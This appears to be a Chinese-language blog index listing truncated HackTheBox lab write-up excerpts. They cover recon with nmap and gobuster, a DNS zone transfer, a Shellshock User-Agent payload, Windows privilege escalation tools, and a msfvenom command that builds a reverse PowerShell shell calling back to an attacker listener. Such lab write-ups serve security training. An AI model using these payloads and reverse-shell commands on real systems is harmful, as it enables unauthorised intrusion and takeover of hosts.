简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...

拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...

前提有cgi-bin  403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...

http://www.zhyann.net/index.php/2024/06/03/granny-webdav%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%e6%bc%8f%e6%b4%9e-churrasco%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87/ 信息收集和权限提升和...

1. 找到名字服务器nslookup > server 10.10.10.13 > 10.10.10.13找到了名字服务器和域名 2. 根据域名找到子域名dig axfr @10.10.10.13 cronos.htb这时候就可以将它们写入/etc/hosts 

简介SiloDifficulty Medium 实验环境攻击者 Kali 10.10.16.18受害者 IP 10.10.10.82 Windows 1. 信息收集收集受害者服务详情使用nmap脚本判断是否有漏洞nmap -Pn -sT --script=oracle-tns-po...